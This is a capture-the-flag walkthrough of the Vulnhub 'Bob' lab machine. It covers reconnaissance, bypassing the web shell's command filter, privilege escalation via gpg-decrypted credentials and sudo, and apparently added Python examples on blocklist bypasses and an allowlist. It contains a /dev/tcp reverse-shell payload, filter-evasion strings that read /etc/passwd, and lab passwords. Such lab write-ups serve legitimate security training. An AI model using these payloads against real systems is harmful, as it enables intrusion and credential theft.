Vulnhub: A Detailed Walkthrough of the Bob Target Machine

Bob

Author: jason_huawen

Target machine information

Name: Bob: 1.0.1

URL:

https://www.vulnhub.com/entry/bob-101,226/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:a5:49:23      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.101  08:00:27:6f:48:2f      1      60  PCS Systemtechnik GmbH       

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.101. The other two hosts in the sweep, 192.168.56.1 and 192.168.56.100, are the VirtualBox host-only adapter and its DHCP server, so .101 is the only candidate.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.101 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 05:06 EST
Nmap scan report for 192.168.56.101
Host is up (0.00035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 4 disallowed entries 
| /login.php /dev_shell.php /lat_memo.html 
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
25468/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 84f2f8e5ed3e14f393d41e4c413ba2a9 (RSA)
|   256 5b98c74f846efd566a351683aa9ceaf8 (ECDSA)
|_  256 391656fb4e0f508540d3532241433815 (ED25519)
MAC Address: 08:00:27:6F:48:2F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.11 seconds

The Nmap results show that the target has two open ports: 80 (HTTP, Apache httpd 2.4.25 on Debian) and 25468 (SSH, OpenSSH 7.4p1, moved off the default port 22). The http-robots.txt script has already revealed four disallowed paths, which are the first things to look at.

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/lat_memo.html
<html>
  
  <body>
    <div id="back">
    <div id="banner" alt="School Banner">
        <img src="school_badge.png" id="logo">
        <div id="bannertext">
          <h1> Milburg Highschool </h1>
          <a href="index.html">Home</a>
          <a href="news.html">News</a>
          <a href="about.html">About Us</a>
          <a href="contact.html">Contact Us</a>
          <a href="login.html">Login</a>
      </div>
    </div>
    <div id="memocontainer">
      <p>
        Memo sent at GMT+10:00 2:37:42 by User: Bob
        <br>
        Hey guys IT here don't forget to check your emails regarding the recent security breach.
        There is a web shell running on the server with no protection but it should be safe as
        I have ported over the filter from the old windows server to our new linux one. Your email
        will have the link to the shell.<br>
        <br>
        -Bob
      </p>
    </div>
  </div>
  </body>
</html>


The memo reveals a user named Bob, confirms that the server runs a web shell (the /dev_shell.php path listed in robots.txt), and states that its command execution is protected only by a filter that was ported over from the old Windows server.

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ curl http://192.168.56.101/passwords.html
<!-- N.T.S Get Sticky Notes to Write Passwords in
-Bob
-->
<!--

-=====Passwords:==-<!
=======-
-->
<!--
-=====WEBSHELL=======-
-->
<!--p
-->
<!--
-====================-

 -->
<html>
<body>
  Really who made this file at least get a hash of your password to display,
  hackers can't do anything with a hash, this is probably why we had a security
  breach in the first place. Comeon
  people this is basic 101 security! I have moved the file off the server. Don't make me have to clean up the mess everytime
  someone does something as stupid as this. We will have a meeting about this and other
  stuff I found on the server. >:(
<br>
  -Bob
  </fieldset>
</body>
</html>
                        

Could the "p" hidden in the comment be bob's password? In any case, let's try it first.

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ssh bob@192.168.56.101 -p 25468
The authenticity of host '[192.168.56.101]:25468 ([192.168.56.101]:25468)' can't be established.
ED25519 key fingerprint is SHA256:OY3LVMIRHTASgrwg8mXjqq8nFPrcwLV7lhRz0gpjwq4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.101]:25468' (ED25519) to the list of known hosts.
  __  __ _ _ _                        _____                          
 |  \/  (_) | |                      / ____|                         
 | \  / |_| | |__  _   _ _ __ __ _  | (___   ___ _ ____   _____ _ __ 
 | |\/| | | | '_ \| | | | '__/ _` |  \___ \ / _ \ '__\ \ / / _ \ '__|
 | |  | | | | |_) | |_| | | | (_| |  ____) |  __/ |   \ V /  __/ |   
 |_|  |_|_|_|_.__/ \__,_|_|  \__, | |_____/ \___|_|    \_/ \___|_|   
                              __/ |                                  
                             |___/                                   


bob@192.168.56.101's password: 
Permission denied, please try again.
bob@192.168.56.101's password: 
Permission denied, please try again.
bob@192.168.56.101's password: 

That does not seem to be it, so let's turn to the web shell instead.

The filter turns out to be weak: after trying a few variations, the following payload gets through dev_shell.php and spawns a reverse shell back to Kali (192.168.56.206):

bash -c 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1'
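Why a "ported over" blocklist tends to fail is worth seeing in code. The example below is added here and is not the source of dev_shell.php (which the walkthrough does not show): it implements two hypothetical blocklist filters, lists inputs that slip past each while still running a blocked program, and contrasts them with an allowlist that maps a client-chosen key to a fixed argv executed without a shell. The BLOCKED and ALLOWED tables are assumptions made up for the illustration.

```python
import re
import subprocess

# Hypothetical blocklist, illustrating the kind of filter the memo describes.
# It is NOT the filter in dev_shell.php; that source is not on the page.
BLOCKED = {"nc", "bash", "sh", "python", "cat", "ls", "pwd"}


def first_word_filter(cmd: str) -> bool:
    """Allow unless the first whitespace-separated token is a blocked program name."""
    tokens = cmd.strip().split()
    return not tokens or tokens[0] not in BLOCKED


def word_filter(cmd: str) -> bool:
    """Stricter variant: allow unless a blocked name appears anywhere as a whole word."""
    pattern = r"\b(" + "|".join(re.escape(name) for name in BLOCKED) + r")\b"
    return re.search(pattern, cmd) is None


# Inputs that pass first_word_filter: the blocked program is simply not the first token.
FIRST_WORD_BYPASSES = [
    "echo hi; bash -c 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1'",  # command separator
    "true || cat /etc/passwd",                                           # shell operator
    "/bin/bash -c id",                                                   # absolute path, not the bare name
]

# Inputs that pass word_filter as well: the shell reassembles the name after quoting/escaping,
# so the filter never sees the string "cat".
WORD_FILTER_BYPASSES = [
    "c'a't /etc/passwd",      # adjacent quoted fragments concatenate to cat
    'ca""t /etc/passwd',      # empty double-quoted string inserted into the word
    r"\c\a\t /etc/passwd",    # backslash before an ordinary character is a no-op in bash
]

# Hardened alternative: the client picks an action name, never a command line.
# argv is fixed server-side and runs without a shell, so metacharacters are inert.
ALLOWED = {
    "uptime": ["uptime"],
    "whoami": ["whoami"],
    "disk": ["df", "-h", "/"],
}


def is_allowed_action(name: str) -> bool:
    """Exact-match lookup; 'uptime; cat /etc/passwd' is simply not a key."""
    return name in ALLOWED


def allowlisted_argv(name: str) -> list:
    if not is_allowed_action(name):
        raise ValueError(f"not an allowed action: {name!r}")
    return list(ALLOWED[name])


def run_allowlisted(name: str) -> str:
    """shell=False: the argv list goes straight to execve, never through /bin/sh."""
    argv = allowlisted_argv(name)
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=5).stdout


if __name__ == "__main__":
    for cmd in FIRST_WORD_BYPASSES:
        print(f"first_word_filter allows {cmd!r}: {first_word_filter(cmd)}")
    for cmd in WORD_FILTER_BYPASSES:
        print(f"word_filter allows {cmd!r}: {word_filter(cmd)}")
    print("allowlisted 'disk' ->", allowlisted_argv("disk"))
    print("allowlisted 'disk; id' ->", is_allowed_action("disk; id"))
```

The design point is that a blocklist has to anticipate every way the shell can rebuild a name, while the allowlist never hands user input to a shell at all; the reverse-shell payload used above is the first bypass in FIRST_WORD_BYPASSES.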

The reverse shell arrives at the netcat listener on Kali Linux:

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ sudo nc -nlvp 5555                                         
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.101] 36358
bash: cannot set terminal process group (514): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Milburg-High:/var/www/html$ 

www-data@Milburg-High:/var/www/html$ cat .hint
cat .hint
Have you tried spawning a tty shell?
Also don't forget to check for hidden files ;)
www-data@Milburg-High:/var/www/html$ which python
which python
/usr/bin/python
www-data@Milburg-High:/var/www/html$ python -c 'import pty;pty.spawn("/bin/bash")'
<html$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Milburg-High:/var/www/html$ 

www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"

Taking the first letter of each echoed line in /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh spells HARPOCRATES, the name of a figure from ancient Greek mythology (the god of silence). That reads like a passphrase hint.

www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>

This hidden file contains plaintext passwords for the users jc and seb.

Switching to jc with that password and running gpg directly on the target to decrypt /home/bob/Documents/login.txt.gpg fails, because gpg cannot reach its agent there:

jc@Milburg-High:/home/bob/Documents$ gpg --decrypt /home/bob/Documents/login.txt.gpg
<ts$ gpg --decrypt /home/bob/Documents/login.txt.gpg
gpg: AES encrypted data
gpg: problem with the agent: Permission denied
gpg: encrypted with 1 passphrase
gpg: decryption failed: No secret key

Instead, copy login.txt.gpg to Kali Linux and decrypt it there. Here it is pulled over HTTP from port 8000 on the target (the walkthrough does not show that step; a throwaway HTTP server started in the directory holding the file is enough). When gpg prompts for the passphrase, HARPOCRATES from notes.sh works:

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ wget http://192.168.56.101:8000/login.txt.gpg                       
--2023-02-01 05:38:50--  http://192.168.56.101:8000/login.txt.gpg
Connecting to 192.168.56.101:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 91 [application/octet-stream]
Saving to: ‘login.txt.gpg’

login.txt.gpg                   100%[=====================================================>]      91  --.-KB/s    in 0s      

2023-02-01 05:38:50 (28.0 MB/s) - ‘login.txt.gpg’ saved [91/91]

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ls
linpeas.sh  login.txt.gpg  nmap_full_scan
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ gpg -d login.txt.gpg 
gpg: keybox '/home/kali/.gnupg/pubring.kbx' created
gpg: AES.CFB encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_

The decryption succeeds and yields bob's password, b0bcat_. Log in over SSH on port 25468 with it:
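Both the notes.sh acrostic and the gpg-agent failure above can be handled from one script. The following Python is an added example, not part of the original walkthrough: it extracts the passphrase candidate from notes.sh and then calls the real gpg binary non-interactively, with a private GNUPGHOME so the "problem with the agent: Permission denied" error cannot occur. The notes.sh text is a constructed copy of the file shown above; the assumption is that gpg (2.1 or newer, for --pinentry-mode loopback) is installed wherever the script runs.

```python
import os
import re
import subprocess
import tempfile
from typing import List, Optional, Tuple

# Constructed copy of notes.sh as found under /home/bob/Documents/.../No_Lookie_In_Here/.
NOTES_SH = """#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
"""

ECHO_RE = re.compile(r'^\s*echo\s+"(.*)"\s*$')


def echoed_strings(script: str) -> List[str]:
    """Pull the quoted argument out of every `echo "..."` line of a shell script."""
    return [m.group(1) for m in map(ECHO_RE.match, script.splitlines()) if m]


def acrostic(lines: List[str]) -> str:
    """First character of each line that starts with a letter; banners like "-= Notes =-" are skipped."""
    return "".join(line[0] for line in lines if line and line[0].isalpha())


def passphrase_candidates(script: str) -> List[str]:
    """The acrostic plus case variants, since the hint does not fix the casing."""
    word = acrostic(echoed_strings(script))
    seen, out = set(), []
    for cand in (word, word.lower(), word.capitalize()):
        if cand not in seen:
            seen.add(cand)
            out.append(cand)
    return out


def gpg_decrypt_argv(path: str) -> List[str]:
    """Non-interactive symmetric decryption: passphrase read from fd 0, plaintext written to stdout."""
    return ["gpg", "--batch", "--quiet", "--pinentry-mode", "loopback",
            "--passphrase-fd", "0", "--output", "-", "--decrypt", path]


def gpg_decrypt(path: str, passphrase: str) -> bytes:
    """Decrypt with a throwaway GNUPGHOME. gpg needs a writable, mode-0700 home to start its
    agent; using one we own avoids the 'problem with the agent: Permission denied' failure."""
    with tempfile.TemporaryDirectory() as home:  # created with mode 0700, as gpg requires
        env = dict(os.environ, GNUPGHOME=home)
        res = subprocess.run(gpg_decrypt_argv(path), input=(passphrase + "\n").encode(),
                             capture_output=True, env=env)
    if res.returncode != 0:
        raise RuntimeError(res.stderr.decode(errors="replace").strip())
    return res.stdout


def try_candidates(path: str, script: str) -> Optional[Tuple[str, bytes]]:
    """Return (passphrase, plaintext) for the first candidate that decrypts the file, else None."""
    for cand in passphrase_candidates(script):
        try:
            return cand, gpg_decrypt(path, cand)
        except RuntimeError:
            continue
    return None


if __name__ == "__main__":
    print("candidates:", passphrase_candidates(NOTES_SH))
    hit = try_candidates("login.txt.gpg", NOTES_SH)  # assumes the file was copied alongside
    print("no candidate worked" if hit is None else f"{hit[0]} -> {hit[1].decode(errors='replace')!r}")
```

Setting GNUPGHOME to a fresh directory would also have worked on the target itself, as long as a writable location such as /tmp was available; the download to Kali is simply the path the walkthrough took.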

┌──(kali㉿kali)-[~/Vulnhub/Bob]
└─$ ssh bob@192.168.56.101 -p 25468              
  __  __ _ _ _                        _____                          
 |  \/  (_) | |                      / ____|                         
 | \  / |_| | |__  _   _ _ __ __ _  | (___   ___ _ ____   _____ _ __ 
 | |\/| | | | '_ \| | | | '__/ _` |  \___ \ / _ \ '__\ \ / / _ \ '__|
 | |  | | | | |_) | |_| | | | (_| |  ____) |  __/ |   \ V /  __/ |   
 |_|  |_|_|_|_.__/ \__,_|_|  \__, | |_____/ \___|_|    \_/ \___|_|   
                              __/ |                                  
                             |___/                                   


bob@192.168.56.101's password: 
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar  8 23:49:12 2018 from 192.168.56.1
bob@Milburg-High:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob),27(sudo)
bob@Milburg-High:~$ sudo -l
sudo: unable to resolve host Milburg-High: Connection refused
[sudo] password for bob: 
Matching Defaults entries for bob on Milburg-High:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bob may run the following commands on Milburg-High:
    (ALL : ALL) ALL
bob@Milburg-High:~$ sudo /bin/bash
sudo: unable to resolve host Milburg-High: Connection refused
root@Milburg-High:/home/bob# cd /root

bob is a member of the sudo group and sudo -l reports (ALL : ALL) ALL, so sudo /bin/bash gives a root shell straight away. The "unable to resolve host Milburg-High" lines are only warnings about a missing hostname entry and do not affect sudo.

Posted @ 2023-02-01 18:52 by Jason_huawen